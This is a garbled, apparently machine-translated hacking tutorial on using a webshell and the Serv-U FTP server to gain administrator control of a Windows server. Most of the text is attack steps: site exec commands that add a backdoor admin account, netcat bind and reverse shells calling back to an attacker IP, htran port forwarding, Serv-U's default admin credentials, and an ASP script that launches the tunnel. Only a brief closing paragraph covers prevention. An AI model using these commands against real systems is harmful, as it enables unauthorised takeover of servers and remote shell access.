Webshell and Serv-u combined to obtain the highest authority of the system

quote site exec net user iisuser password /add Add a user named iisuser password as password, add to the administrator group quota site exec net localgroup administrators iisuser /add, now you can connect Pick up the terminal and log in. Of course, you can also perform other operations, such as uploading an nc.exe, and getting a shell with administrator privileges on the target machine, either forward or reverse. Forward connection: Connect to ftp and execute 
quote site exec nc.exe -l -p 23 -t -e cmd.exe At this point, the target host becomes a telnet server, you can telnet the target server 23 Port. Reverse connection: Suppose your IP is 202.96.209.168 1. Run it on your own machine (you must have an external IP): nc -vv -lp 99 2. Run nc -e cmd on the target machine. Exe 202.96.209.168 99 On your machine you will get a shell with administrator privileges on the target machine. If the other party has port filtering or set firewall protection (this protection does not limit the bounce connection, if it is restricted, it will be changed) Other methods) can be implemented using TCP SOCKET forwarding. For example: My machine is A; the machine I want to test is B [Do not allow front connection]; I have already got a SHELL on B [as long as the guest is on it]? We can connect to each other's 43958: I: I am listening to two ports 23 and 56 23 locally, waiting for B to connect; 56 is waiting for me to connect; II: B connecting 23 I am listening, and forwarding to local The 43958 will be built like this. The firewall of the other party will take us no way? At this point, run Serv-U locally to create a new SERVER, IP fill in the local 127.0.0.1 port for 56 users localAdministrator, password #l@$ak#.lk; 0@P.  concrete implementation method
 Suppose your IP is 202.96.209.168 1. Run htran.exe -listen 23 56 on your own machine; 2. Run Serv-U locally to create a new SERVER, IP fill The local 127.0.0.1 port is 56, the username LocalAdministrator, password #l@$ak#.lk;0@P; Run htran.exe on the target machine -slave 127.0.0.1 43958 202.96.209.168 23 If you can't run directly under webshell, you can write an asp script to execute, as follows: 
connect.asp<%Set oScript = Server. CreateObject("WSCRIPT.SHELL")oScript.Run (server.mappath("htran")&" -slave 127.0.0.1 43958 202.96.209.168 23 ")%>Execute http://destination URL/connect.asp, If it comes out blank, no error is indicated, now you should be able to manage the Serv-U of the target server, and the rest will depend on your free play. Htran.exe is a multi-threaded package forwarding tool that can be downloaded to Red Alliance Preventing Method
 to patch Serv-U and change the default port and management password. Modify the two files ServUAdmin.exe and ServUDaemon.exe. Change the port as long as you add LocalSetupPortNo=12345 in the ServUDaemon.ini file [GLOBAL] option. Unfortunately, the latest version of Serv-U Serv-U 5.2.0.0 is still available. No changes, the default management port and password are still the original.